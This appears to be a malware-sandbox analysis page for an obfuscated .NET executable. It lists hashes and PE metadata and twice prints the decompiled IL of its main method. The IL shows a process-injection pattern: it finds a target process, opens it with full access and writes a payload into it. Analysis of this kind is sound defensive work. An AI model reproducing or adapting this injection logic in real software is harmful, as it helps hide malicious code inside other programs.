Suspicious
Suspect

2cbf95b5b8b55e370847249971f3d7b6

PE Executable
|
MD5: 2cbf95b5b8b55e370847249971f3d7b6
|
Size: 134.66 KB
|
application/x-dosexec

Summary by MalvaGPT
Characteristics

Symbol Ofbuscation Score

Medium

Hash
Hash Value
MD5
2cbf95b5b8b55e370847249971f3d7b6
Sha1
93d594d3eb56892f74921470c589c43186118ec9
Sha256
4bce5c43d01102b83bf0cb0b85d09ea8a758262b98b04aeccff957aad024f7bd
Sha384
c87c332e02a6b771e338acd111ee30204f17b5709528509751a955315f4fafb6b474e5635fd05950b2e65069d1d066d4
Sha512
7ac0837d07fbabc1d4c9996f941f1a5ace18917ff8e79ff324cd33312a1e3fe467aa55ad70a319ceabf1cb7825f1b29a0b8011b60f7a42a432d45d6932139a37
SSDeep
3072:RauLVTnW5x8rPRESaIkGlzj+LULAR+d3tUHXSTlbi9j/B:RhZTnrRLpzsULARS9U
TLSH
80D39F4BF74491A5C5791B37C8B74D5803F5D26ABE83EB5F01ECA2381AB32DC5A06364

PeID

.NET executable
Microsoft Visual C# / Basic .NET
Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual C# v7.0 / Basic .NET
Microsoft Visual Studio .NET
File Structure
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
Informations
Name
Value
Info

PE Detect: PeReader OK (file layout)

Module Name

Kolnusb

Full Name

Kolnusb

EntryPoint

System.Void Ⴄ.Ⴄ::Ⴄ(System.String[])

Scope Name

Kolnusb

Scope Type

ModuleDef

Kind

Windows

Runtime Version

v4.0.30319

Tables Header Version

512

WinMD Version

<null>

Assembly Name

WindowsFormsApp1

Assembly Version

1.0.0.0

Assembly Culture

<null>

Has PublicKey

False

PublicKey Token

<null>

Target Framework

.NETFramework,Version=v4.0

Total Strings

0

Main Method

System.Void Ⴄ.Ⴄ::Ⴄ(System.String[])

Main IL Instruction Count

406

Main IL

call System.Void uPFArRnTARbbMJpeNbLhMlxvheTdOtCVIquXjZFz::Ⴃ() ldc.i4.4 <null> stloc.s V_9 ldloc.s V_9 switch dnlib.DotNet.Emit.Instruction[] ldc.i4.s 22 stloc.s V_6 ldc.i4.s 47 stloc.s V_9 br IL_0008: ldloc.s V_9 ldloc.s V_6 switch dnlib.DotNet.Emit.Instruction[] ldc.i4.s 24 stloc.s V_9 br IL_0008: ldloc.s V_9 ldc.i4.s 23 br.s IL_014D: stloc.s V_9 ldc.i4.s 39 br.s IL_014D: stloc.s V_9 ldc.i4.s 39 br.s IL_014D: stloc.s V_9 ldc.i4.s 28 br.s IL_014D: stloc.s V_9 ldc.i4.s 11 br.s IL_014D: stloc.s V_9 ldc.i4.s 45 br.s IL_014D: stloc.s V_9 ldc.i4.6 <null> br.s IL_014D: stloc.s V_9 ldc.i4.1 <null> br.s IL_014D: stloc.s V_9 ldc.i4.3 <null> br.s IL_014D: stloc.s V_9 ldc.i4.s 33 br.s IL_014D: stloc.s V_9 ldc.i4.s 18 br.s IL_014D: stloc.s V_9 ldc.i4.s 16 br.s IL_014D: stloc.s V_9 ldc.i4.s 43 br.s IL_014D: stloc.s V_9 ldc.i4.s 17 br.s IL_014D: stloc.s V_9 ldc.i4.s 36 br.s IL_014D: stloc.s V_9 ldc.i4.s 14 br.s IL_014D: stloc.s V_9 ldc.i4.s 19 br.s IL_014D: stloc.s V_9 ldc.i4.s 29 br.s IL_014D: stloc.s V_9 ldc.i4.s 15 br.s IL_014D: stloc.s V_9 ldc.i4.s 9 br.s IL_014D: stloc.s V_9 ldc.i4.8 <null> br.s IL_014D: stloc.s V_9 ldc.i4.s 37 br.s IL_014D: stloc.s V_9 ldc.i4.s 24 br.s IL_014D: stloc.s V_9 ldc.i4.s 12 stloc.s V_4 ldc.i4.s 15 stloc.s V_6 ldc.i4.s 47 stloc.s V_9 br IL_0008: ldloc.s V_9 ldloc.s V_4 switch dnlib.DotNet.Emit.Instruction[] ldc.i4.s 31 stloc.s V_9 br IL_0008: ldloc.s V_9 ldc.i4.s 12 br.s IL_01FA: stloc.s V_9 ldc.i4.s 25 br.s IL_01FA: stloc.s V_9 ldc.i4.7 <null> br.s IL_01FA: stloc.s V_9 ldc.i4.s 40 br.s IL_01FA: stloc.s V_9 ldc.i4.s 50 br.s IL_01FA: stloc.s V_9 ldc.i4.s 35 br.s IL_01FA: stloc.s V_9 ldc.i4.s 34 br.s IL_01FA: stloc.s V_9 ldc.i4.s 32 br.s IL_01FA: stloc.s V_9 ldc.i4.s 22 br.s IL_01FA: stloc.s V_9 ldc.i4.s 41 br.s IL_01FA: stloc.s V_9 ldc.i4.s 27 br.s IL_01FA: stloc.s V_9 ldc.i4.s 48 br.s IL_01FA: stloc.s V_9 ldc.i4.5 <null> br.s IL_01FA: stloc.s V_9 ldc.i4.4 <null> stloc.s V_6 ldc.i4.s 47 stloc.s V_9 br IL_0008: ldloc.s V_9 ldc.i4.s 12 br.s IL_0234: stloc.s V_6 ldc.i4.s 20 br.s IL_0234: stloc.s V_6 ldc.i4.s 20 br.s IL_0234: stloc.s V_6 ldc.i4.s 21 br.s IL_0234: stloc.s V_6 ldc.i4.s 14 br.s IL_0234: stloc.s V_6 ldc.i4.s 13 br.s IL_0234: stloc.s V_6 ldc.i4.3 <null> br.s IL_0234: stloc.s V_6 ldc.i4.4 <null> br.s IL_0234: stloc.s V_6 ldc.i4.s 11 br.s IL_0234: stloc.s V_6 ldc.i4.s 17 br.s IL_0234: stloc.s V_6 ldc.i4.5 <null> br.s IL_0234: stloc.s V_6 ldc.i4.3 <null> br.s IL_0234: stloc.s V_6 ldc.i4.4 <null> br.s IL_0234: stloc.s V_6 call System.Void Ⴄ.Ⴄ::Ⴓ() call System.String <Module>::VbipVMiymx() stloc.0 <null> call System.Byte[] Ⴄ.Ⴄ::Ⴃ() stloc.1 <null> ldc.i4.s 17 stloc.s V_6 ldc.i4.s 47 stloc.s V_9 br IL_0008: ldloc.s V_9 ldloc.1 <null> brfalse.s IL_0297: ldc.i4.s 44 ldc.i4.0 <null> stloc.s V_9 br IL_0008: ldloc.s V_9 ldc.i4.s 44 br.s IL_0290: stloc.s V_9 ldc.i4.6 <null> stloc.s V_6 ldc.i4.s 47 stloc.s V_9 br IL_0008: ldloc.s V_9 ldc.i4.s 18 br.s IL_029C: stloc.s V_6 ldc.i4.3 <null> stloc.s V_4 ldc.i4.s 18 stloc.s V_9 br IL_0008: ldloc.s V_9 ldc.i4.s 15 stloc.s V_6 ldc.i4.s 47 stloc.s V_9 br IL_0008: ldloc.s V_9 ldc.i4.8 <null> br.s IL_02AC: stloc.s V_4 ldloc.1 <null> ldlen <null> brtrue.s IL_02D4: ldc.i4.2 ldc.i4.s 26 stloc.s V_9 br IL_0008: ldloc.s V_9 ldc.i4.2 <null> br.s IL_02CD: stloc.s V_9 ldc.i4.s 9 stloc.s V_6 ldc.i4.s 47 stloc.s V_9 br IL_0008: ldloc.s V_9 ldc.i4.0 <null> br.s IL_02D9: stloc.s V_6 ldc.i4.8 <null> stloc.s V_4 ldc.i4.s 15 stloc.s V_6 ldc.i4.s 47 stloc.s V_9 br IL_0008: ldloc.s V_9 ldc.i4.s 11 br.s IL_02E8: stloc.s V_4 ldc.i4.1 <null> ldc.i4.s 81 ldc.i4.s 17 call System.Void uPFArRnTARbbMJpeNbLhMlxvheTdOtCVIquXjZFz/Ⴓ::Ⴄ(System.Int32,System.Int32,System.Int32) ldloc.0 <null> ldc.i4 622 ldc.i4 630 call System.Diagnostics.Process[] Ⴄ.Ⴄ/ႭႣ::Ⴀ(System.String,System.Int32,System.Int32) call System.Diagnostics.Process System.Linq.Enumerable::FirstOrDefault<System.Diagnostics.Process>(System.Collections.Generic.IEnumerable`1<System.Diagnostics.Process>) stloc.2 <null> ldloc.2 <null> brtrue.s IL_0327: ldc.i4.s 42 ldc.i4.s 49 stloc.s V_9 br IL_0008: ldloc.s V_9 ldc.i4.s 42 br.s IL_0320: stloc.s V_9 ldc.i4.s 16 stloc.s V_6 ldc.i4.s 47 stloc.s V_9 br IL_0008: ldloc.s V_9 ldc.i4.1 <null> br.s IL_032D: stloc.s V_6 ldc.i4.5 <null> stloc.s V_4 ldc.i4.s 15 stloc.s V_6 ldc.i4.s 47 stloc.s V_9 br IL_0008: ldloc.s V_9 ldc.i4.0 <null> br.s IL_033C: stloc.s V_4 ldloc.0 <null> call System.String <Module>::mGEALNHjbX() ldc.i4 1022 ldc.i4 960 call System.String uPFArRnTARbbMJpeNbLhMlxvheTdOtCVIquXjZFz/Ⴈ::Ⴍ(System.String,System.String,System.Int32,System.Int32) ldc.i4.s 73 ldc.i4.s 122 call System.Diagnostics.Process uPFArRnTARbbMJpeNbLhMlxvheTdOtCVIquXjZFz::Ⴗ(System.String,System.Int32,System.Int32) stloc.2 <null> ldc.i4.s 10 stloc.s V_4 ldc.i4.s 13 stloc.s V_9 br IL_0008: ldloc.s V_9 ldc.i4.s 15 stloc.s V_6 ldc.i4.s 47 stloc.s V_9 br IL_0008: ldloc.s V_9 ldc.i4 1500 ldc.i4 296 ldc.i4 279 call System.Void uPFArRnTARbbMJpeNbLhMlxvheTdOtCVIquXjZFz/Ⴓ::Ⴄ(System.Int32,System.Int32,System.Int32) ldc.i4 2035711 ldc.i4.0 <null> ldloc.2 <null> ldc.i4 820 ldc.i4 773 call System.Int32 uPFArRnTARbbMJpeNbLhMlxvheTdOtCVIquXjZFz/Ⴈ::Ⴃ(System.Diagnostics.Process,System.Int32,System.Int32) call System.IntPtr Ⴄ.Ⴄ::Ⴄ(System.UInt32,System.Boolean,System.Int32) dup <null> ldsfld System.IntPtr System.IntPtr::Zero ldc.i4 821 ldc.i4 859 call System.Boolean uPFArRnTARbbMJpeNbLhMlxvheTdOtCVIquXjZFz/Ⴓ::Ⴄ(System.IntPtr,System.IntPtr,System.Int32,System.Int32) brfalse.s IL_03DD: dup ldc.i4.1 <null> ldc.i4 889 ldc.i4 825 call System.Void uPFArRnTARbbMJpeNbLhMlxvheTdOtCVIquXjZFz/Ⴓ::Ⴄ(System.Int32,System.Int32,System.Int32) dup <null> ldloc.1 <null> call System.IntPtr Ⴄ.Ⴄ::Ⴃ(System.IntPtr,System.Byte[]) stloc.3 <null> ldloc.3 <null> ldsfld System.IntPtr System.IntPtr::Zero ldc.i4 914 ldc.i4 946 call System.Boolean Ⴄ.Ⴗ/ႠႠ::Ⴄ(System.IntPtr,System.IntPtr,System.Int32,System.Int32) brfalse.s IL_040C: ldloc.1 ldc.i4.1 <null> ldc.i4 912 ldc.i4 940 call System.Void Ⴄ.Ⴅ::Ⴃ(System.Int32,System.Int32,System.Int32) ldloc.1 <null> ldloc.3 <null> call System.Void Ⴄ.Ⴄ::Ⴗ(System.IntPtr,System.Byte[],System.IntPtr) ldc.i4 648 ldc.i4 714 call System.Boolean Ⴄ.Ⴅ::Ⴓ(System.Int32,System.Int32) brtrue.s IL_042D: ldc.i4.s 46 ldc.i4.s 21 stloc.s V_9 br IL_0008: ldloc.s V_9 ldc.i4.s 46 br.s IL_0426: stloc.s V_9 ldc.i4.8 <null> stloc.s V_6 ldc.i4.s 47 stloc.s V_9 br IL_0008: ldloc.s V_9 ldc.i4.s 19 br.s IL_0432: stloc.s V_6 ldc.i4.4 <null> stloc.s V_4 ldc.i4.s 15 stloc.s V_6 ldc.i4.s 47 stloc.s V_9 br IL_0008: ldloc.s V_9 ldc.i4.2 <null> br.s IL_0442: stloc.s V_4 ldc.i4.0 <null> ldc.i4 570 ldc.i4 518 call System.Void Ⴄ.Ⴅ::Ⴃ(System.Int32,System.Int32,System.Int32) leave.s IL_0473: ldc.i4.s 10 pop <null> ldc.i4.1 <null> ldc.i4.s 127 ldc.i4.s 61 call System.Void Ⴄ.Ⴗ/ႠႠ::Ⴍ(System.Int32,System.Int32,System.Int32) leave.s IL_0473: ldc.i4.s 10 ldc.i4.s 10 stloc.s V_10 ldloc.s V_10 switch dnlib.DotNet.Emit.Instruction[] ldc.i4.0 <null> stloc.s V_7 ldc.i4.s 12 stloc.s V_10 br.s IL_0477: ldloc.s V_10 ldloc.s V_7 switch dnlib.DotNet.Emit.Instruction[] ldc.i4.7 <null> stloc.s V_10 br.s IL_0477: ldloc.s V_10 ldc.i4.7 <null> br.s IL_04DF: stloc.s V_10 ldc.i4.8 <null> br.s IL_04DF: stloc.s V_10 ldc.i4.8 <null> br.s IL_04DF: stloc.s V_10 ldc.i4.7 <null> br.s IL_04DF: stloc.s V_10 ldc.i4.0 <null> br.s IL_04DF: stloc.s V_10 ldc.i4.3 <null> stloc.s V_5 ldc.i4.0 <null> stloc.s V_10 br IL_0477: ldloc.s V_10 ldloc.s V_5 switch dnlib.DotNet.Emit.Instruction[] ldc.i4.1 <null> stloc.s V_10 br IL_0477: ldloc.s V_10 ldc.i4.2 <null> br.s IL_0519: stloc.s V_10 ldc.i4.6 <null> br.s IL_0519: stloc.s V_10 ldc.i4.s 11 br.s IL_0519: stloc.s V_10 ldc.i4.s 14 br.s IL_0519: stloc.s V_10 ldc.i4.3 <null> br.s IL_0519: stloc.s V_10 ldc.i4.1 <null> stloc.s V_7 ldc.i4.s 12 stloc.s V_10 br IL_0477: ldloc.s V_10 ldc.i4.1 <null> br.s IL_0532: stloc.s V_7 ldc.i4.1 <null> br.s IL_0532: stloc.s V_7 ldc.i4.1 <null> br.s IL_0532: stloc.s V_7 ldc.i4.1 <null> br.s IL_0532: stloc.s V_7 ldc.i4.1 <null> br.s IL_0532: stloc.s V_7 ret <null> ldc.i4.1 <null> stloc.s V_11 ldloc.s V_11 switch dnlib.DotNet.Emit.Instruction[] ldtoken System.Void Ⴄ.Ⴄ::Ⴄ(System.String[]) pop <null> ret <null> ldc.i4.1 <null> stloc.s V_8 ldloc.s V_8 switch dnlib.DotNet.Emit.Instruction[] ldc.i4.4 <null> stloc.s V_11 br.s IL_0550: ldloc.s V_11 ldc.i4.5 <null> br.s IL_0599: stloc.s V_11 ldc.i4.4 <null> br.s IL_0599: stloc.s V_11 ldc.i4.4 <null> br.s IL_0599: stloc.s V_11 ldc.i4.4 <null> br.s IL_0599: stloc.s V_11 ldc.i4.5 <null> br.s IL_0599: stloc.s V_11 ldtoken System.Void Ⴄ.Ⴄ::Ⴄ(System.String[]) pop <null> ret <null> ldtoken System.Void Ⴄ.Ⴄ::Ⴄ(System.String[]) pop <null> ret <null>

Module Name

Kolnusb

Full Name

Kolnusb

EntryPoint

System.Void Ⴄ.Ⴄ::Ⴄ(System.String[])

Scope Name

Kolnusb

Scope Type

ModuleDef

Kind

Windows

Runtime Version

v4.0.30319

Tables Header Version

512

WinMD Version

<null>

Assembly Name

WindowsFormsApp1

Assembly Version

1.0.0.0

Assembly Culture

<null>

Has PublicKey

False

PublicKey Token

<null>

Target Framework

.NETFramework,Version=v4.0

Total Strings

0

Main Method

System.Void Ⴄ.Ⴄ::Ⴄ(System.String[])

Main IL Instruction Count

406

Main IL

call System.Void uPFArRnTARbbMJpeNbLhMlxvheTdOtCVIquXjZFz::Ⴃ() ldc.i4.4 <null> stloc.s V_9 ldloc.s V_9 switch dnlib.DotNet.Emit.Instruction[] ldc.i4.s 22 stloc.s V_6 ldc.i4.s 47 stloc.s V_9 br IL_0008: ldloc.s V_9 ldloc.s V_6 switch dnlib.DotNet.Emit.Instruction[] ldc.i4.s 24 stloc.s V_9 br IL_0008: ldloc.s V_9 ldc.i4.s 23 br.s IL_014D: stloc.s V_9 ldc.i4.s 39 br.s IL_014D: stloc.s V_9 ldc.i4.s 39 br.s IL_014D: stloc.s V_9 ldc.i4.s 28 br.s IL_014D: stloc.s V_9 ldc.i4.s 11 br.s IL_014D: stloc.s V_9 ldc.i4.s 45 br.s IL_014D: stloc.s V_9 ldc.i4.6 <null> br.s IL_014D: stloc.s V_9 ldc.i4.1 <null> br.s IL_014D: stloc.s V_9 ldc.i4.3 <null> br.s IL_014D: stloc.s V_9 ldc.i4.s 33 br.s IL_014D: stloc.s V_9 ldc.i4.s 18 br.s IL_014D: stloc.s V_9 ldc.i4.s 16 br.s IL_014D: stloc.s V_9 ldc.i4.s 43 br.s IL_014D: stloc.s V_9 ldc.i4.s 17 br.s IL_014D: stloc.s V_9 ldc.i4.s 36 br.s IL_014D: stloc.s V_9 ldc.i4.s 14 br.s IL_014D: stloc.s V_9 ldc.i4.s 19 br.s IL_014D: stloc.s V_9 ldc.i4.s 29 br.s IL_014D: stloc.s V_9 ldc.i4.s 15 br.s IL_014D: stloc.s V_9 ldc.i4.s 9 br.s IL_014D: stloc.s V_9 ldc.i4.8 <null> br.s IL_014D: stloc.s V_9 ldc.i4.s 37 br.s IL_014D: stloc.s V_9 ldc.i4.s 24 br.s IL_014D: stloc.s V_9 ldc.i4.s 12 stloc.s V_4 ldc.i4.s 15 stloc.s V_6 ldc.i4.s 47 stloc.s V_9 br IL_0008: ldloc.s V_9 ldloc.s V_4 switch dnlib.DotNet.Emit.Instruction[] ldc.i4.s 31 stloc.s V_9 br IL_0008: ldloc.s V_9 ldc.i4.s 12 br.s IL_01FA: stloc.s V_9 ldc.i4.s 25 br.s IL_01FA: stloc.s V_9 ldc.i4.7 <null> br.s IL_01FA: stloc.s V_9 ldc.i4.s 40 br.s IL_01FA: stloc.s V_9 ldc.i4.s 50 br.s IL_01FA: stloc.s V_9 ldc.i4.s 35 br.s IL_01FA: stloc.s V_9 ldc.i4.s 34 br.s IL_01FA: stloc.s V_9 ldc.i4.s 32 br.s IL_01FA: stloc.s V_9 ldc.i4.s 22 br.s IL_01FA: stloc.s V_9 ldc.i4.s 41 br.s IL_01FA: stloc.s V_9 ldc.i4.s 27 br.s IL_01FA: stloc.s V_9 ldc.i4.s 48 br.s IL_01FA: stloc.s V_9 ldc.i4.5 <null> br.s IL_01FA: stloc.s V_9 ldc.i4.4 <null> stloc.s V_6 ldc.i4.s 47 stloc.s V_9 br IL_0008: ldloc.s V_9 ldc.i4.s 12 br.s IL_0234: stloc.s V_6 ldc.i4.s 20 br.s IL_0234: stloc.s V_6 ldc.i4.s 20 br.s IL_0234: stloc.s V_6 ldc.i4.s 21 br.s IL_0234: stloc.s V_6 ldc.i4.s 14 br.s IL_0234: stloc.s V_6 ldc.i4.s 13 br.s IL_0234: stloc.s V_6 ldc.i4.3 <null> br.s IL_0234: stloc.s V_6 ldc.i4.4 <null> br.s IL_0234: stloc.s V_6 ldc.i4.s 11 br.s IL_0234: stloc.s V_6 ldc.i4.s 17 br.s IL_0234: stloc.s V_6 ldc.i4.5 <null> br.s IL_0234: stloc.s V_6 ldc.i4.3 <null> br.s IL_0234: stloc.s V_6 ldc.i4.4 <null> br.s IL_0234: stloc.s V_6 call System.Void Ⴄ.Ⴄ::Ⴓ() call System.String <Module>::VbipVMiymx() stloc.0 <null> call System.Byte[] Ⴄ.Ⴄ::Ⴃ() stloc.1 <null> ldc.i4.s 17 stloc.s V_6 ldc.i4.s 47 stloc.s V_9 br IL_0008: ldloc.s V_9 ldloc.1 <null> brfalse.s IL_0297: ldc.i4.s 44 ldc.i4.0 <null> stloc.s V_9 br IL_0008: ldloc.s V_9 ldc.i4.s 44 br.s IL_0290: stloc.s V_9 ldc.i4.6 <null> stloc.s V_6 ldc.i4.s 47 stloc.s V_9 br IL_0008: ldloc.s V_9 ldc.i4.s 18 br.s IL_029C: stloc.s V_6 ldc.i4.3 <null> stloc.s V_4 ldc.i4.s 18 stloc.s V_9 br IL_0008: ldloc.s V_9 ldc.i4.s 15 stloc.s V_6 ldc.i4.s 47 stloc.s V_9 br IL_0008: ldloc.s V_9 ldc.i4.8 <null> br.s IL_02AC: stloc.s V_4 ldloc.1 <null> ldlen <null> brtrue.s IL_02D4: ldc.i4.2 ldc.i4.s 26 stloc.s V_9 br IL_0008: ldloc.s V_9 ldc.i4.2 <null> br.s IL_02CD: stloc.s V_9 ldc.i4.s 9 stloc.s V_6 ldc.i4.s 47 stloc.s V_9 br IL_0008: ldloc.s V_9 ldc.i4.0 <null> br.s IL_02D9: stloc.s V_6 ldc.i4.8 <null> stloc.s V_4 ldc.i4.s 15 stloc.s V_6 ldc.i4.s 47 stloc.s V_9 br IL_0008: ldloc.s V_9 ldc.i4.s 11 br.s IL_02E8: stloc.s V_4 ldc.i4.1 <null> ldc.i4.s 81 ldc.i4.s 17 call System.Void uPFArRnTARbbMJpeNbLhMlxvheTdOtCVIquXjZFz/Ⴓ::Ⴄ(System.Int32,System.Int32,System.Int32) ldloc.0 <null> ldc.i4 622 ldc.i4 630 call System.Diagnostics.Process[] Ⴄ.Ⴄ/ႭႣ::Ⴀ(System.String,System.Int32,System.Int32) call System.Diagnostics.Process System.Linq.Enumerable::FirstOrDefault<System.Diagnostics.Process>(System.Collections.Generic.IEnumerable`1<System.Diagnostics.Process>) stloc.2 <null> ldloc.2 <null> brtrue.s IL_0327: ldc.i4.s 42 ldc.i4.s 49 stloc.s V_9 br IL_0008: ldloc.s V_9 ldc.i4.s 42 br.s IL_0320: stloc.s V_9 ldc.i4.s 16 stloc.s V_6 ldc.i4.s 47 stloc.s V_9 br IL_0008: ldloc.s V_9 ldc.i4.1 <null> br.s IL_032D: stloc.s V_6 ldc.i4.5 <null> stloc.s V_4 ldc.i4.s 15 stloc.s V_6 ldc.i4.s 47 stloc.s V_9 br IL_0008: ldloc.s V_9 ldc.i4.0 <null> br.s IL_033C: stloc.s V_4 ldloc.0 <null> call System.String <Module>::mGEALNHjbX() ldc.i4 1022 ldc.i4 960 call System.String uPFArRnTARbbMJpeNbLhMlxvheTdOtCVIquXjZFz/Ⴈ::Ⴍ(System.String,System.String,System.Int32,System.Int32) ldc.i4.s 73 ldc.i4.s 122 call System.Diagnostics.Process uPFArRnTARbbMJpeNbLhMlxvheTdOtCVIquXjZFz::Ⴗ(System.String,System.Int32,System.Int32) stloc.2 <null> ldc.i4.s 10 stloc.s V_4 ldc.i4.s 13 stloc.s V_9 br IL_0008: ldloc.s V_9 ldc.i4.s 15 stloc.s V_6 ldc.i4.s 47 stloc.s V_9 br IL_0008: ldloc.s V_9 ldc.i4 1500 ldc.i4 296 ldc.i4 279 call System.Void uPFArRnTARbbMJpeNbLhMlxvheTdOtCVIquXjZFz/Ⴓ::Ⴄ(System.Int32,System.Int32,System.Int32) ldc.i4 2035711 ldc.i4.0 <null> ldloc.2 <null> ldc.i4 820 ldc.i4 773 call System.Int32 uPFArRnTARbbMJpeNbLhMlxvheTdOtCVIquXjZFz/Ⴈ::Ⴃ(System.Diagnostics.Process,System.Int32,System.Int32) call System.IntPtr Ⴄ.Ⴄ::Ⴄ(System.UInt32,System.Boolean,System.Int32) dup <null> ldsfld System.IntPtr System.IntPtr::Zero ldc.i4 821 ldc.i4 859 call System.Boolean uPFArRnTARbbMJpeNbLhMlxvheTdOtCVIquXjZFz/Ⴓ::Ⴄ(System.IntPtr,System.IntPtr,System.Int32,System.Int32) brfalse.s IL_03DD: dup ldc.i4.1 <null> ldc.i4 889 ldc.i4 825 call System.Void uPFArRnTARbbMJpeNbLhMlxvheTdOtCVIquXjZFz/Ⴓ::Ⴄ(System.Int32,System.Int32,System.Int32) dup <null> ldloc.1 <null> call System.IntPtr Ⴄ.Ⴄ::Ⴃ(System.IntPtr,System.Byte[]) stloc.3 <null> ldloc.3 <null> ldsfld System.IntPtr System.IntPtr::Zero ldc.i4 914 ldc.i4 946 call System.Boolean Ⴄ.Ⴗ/ႠႠ::Ⴄ(System.IntPtr,System.IntPtr,System.Int32,System.Int32) brfalse.s IL_040C: ldloc.1 ldc.i4.1 <null> ldc.i4 912 ldc.i4 940 call System.Void Ⴄ.Ⴅ::Ⴃ(System.Int32,System.Int32,System.Int32) ldloc.1 <null> ldloc.3 <null> call System.Void Ⴄ.Ⴄ::Ⴗ(System.IntPtr,System.Byte[],System.IntPtr) ldc.i4 648 ldc.i4 714 call System.Boolean Ⴄ.Ⴅ::Ⴓ(System.Int32,System.Int32) brtrue.s IL_042D: ldc.i4.s 46 ldc.i4.s 21 stloc.s V_9 br IL_0008: ldloc.s V_9 ldc.i4.s 46 br.s IL_0426: stloc.s V_9 ldc.i4.8 <null> stloc.s V_6 ldc.i4.s 47 stloc.s V_9 br IL_0008: ldloc.s V_9 ldc.i4.s 19 br.s IL_0432: stloc.s V_6 ldc.i4.4 <null> stloc.s V_4 ldc.i4.s 15 stloc.s V_6 ldc.i4.s 47 stloc.s V_9 br IL_0008: ldloc.s V_9 ldc.i4.2 <null> br.s IL_0442: stloc.s V_4 ldc.i4.0 <null> ldc.i4 570 ldc.i4 518 call System.Void Ⴄ.Ⴅ::Ⴃ(System.Int32,System.Int32,System.Int32) leave.s IL_0473: ldc.i4.s 10 pop <null> ldc.i4.1 <null> ldc.i4.s 127 ldc.i4.s 61 call System.Void Ⴄ.Ⴗ/ႠႠ::Ⴍ(System.Int32,System.Int32,System.Int32) leave.s IL_0473: ldc.i4.s 10 ldc.i4.s 10 stloc.s V_10 ldloc.s V_10 switch dnlib.DotNet.Emit.Instruction[] ldc.i4.0 <null> stloc.s V_7 ldc.i4.s 12 stloc.s V_10 br.s IL_0477: ldloc.s V_10 ldloc.s V_7 switch dnlib.DotNet.Emit.Instruction[] ldc.i4.7 <null> stloc.s V_10 br.s IL_0477: ldloc.s V_10 ldc.i4.7 <null> br.s IL_04DF: stloc.s V_10 ldc.i4.8 <null> br.s IL_04DF: stloc.s V_10 ldc.i4.8 <null> br.s IL_04DF: stloc.s V_10 ldc.i4.7 <null> br.s IL_04DF: stloc.s V_10 ldc.i4.0 <null> br.s IL_04DF: stloc.s V_10 ldc.i4.3 <null> stloc.s V_5 ldc.i4.0 <null> stloc.s V_10 br IL_0477: ldloc.s V_10 ldloc.s V_5 switch dnlib.DotNet.Emit.Instruction[] ldc.i4.1 <null> stloc.s V_10 br IL_0477: ldloc.s V_10 ldc.i4.2 <null> br.s IL_0519: stloc.s V_10 ldc.i4.6 <null> br.s IL_0519: stloc.s V_10 ldc.i4.s 11 br.s IL_0519: stloc.s V_10 ldc.i4.s 14 br.s IL_0519: stloc.s V_10 ldc.i4.3 <null> br.s IL_0519: stloc.s V_10 ldc.i4.1 <null> stloc.s V_7 ldc.i4.s 12 stloc.s V_10 br IL_0477: ldloc.s V_10 ldc.i4.1 <null> br.s IL_0532: stloc.s V_7 ldc.i4.1 <null> br.s IL_0532: stloc.s V_7 ldc.i4.1 <null> br.s IL_0532: stloc.s V_7 ldc.i4.1 <null> br.s IL_0532: stloc.s V_7 ldc.i4.1 <null> br.s IL_0532: stloc.s V_7 ret <null> ldc.i4.1 <null> stloc.s V_11 ldloc.s V_11 switch dnlib.DotNet.Emit.Instruction[] ldtoken System.Void Ⴄ.Ⴄ::Ⴄ(System.String[]) pop <null> ret <null> ldc.i4.1 <null> stloc.s V_8 ldloc.s V_8 switch dnlib.DotNet.Emit.Instruction[] ldc.i4.4 <null> stloc.s V_11 br.s IL_0550: ldloc.s V_11 ldc.i4.5 <null> br.s IL_0599: stloc.s V_11 ldc.i4.4 <null> br.s IL_0599: stloc.s V_11 ldc.i4.4 <null> br.s IL_0599: stloc.s V_11 ldc.i4.4 <null> br.s IL_0599: stloc.s V_11 ldc.i4.5 <null> br.s IL_0599: stloc.s V_11 ldtoken System.Void Ⴄ.Ⴄ::Ⴄ(System.String[]) pop <null> ret <null> ldtoken System.Void Ⴄ.Ⴄ::Ⴄ(System.String[]) pop <null> ret <null>

2cbf95b5b8b55e370847249971f3d7b6 (134.66 KB)
File Structure
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
Characteristics
No malware configuration were found at this point.
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙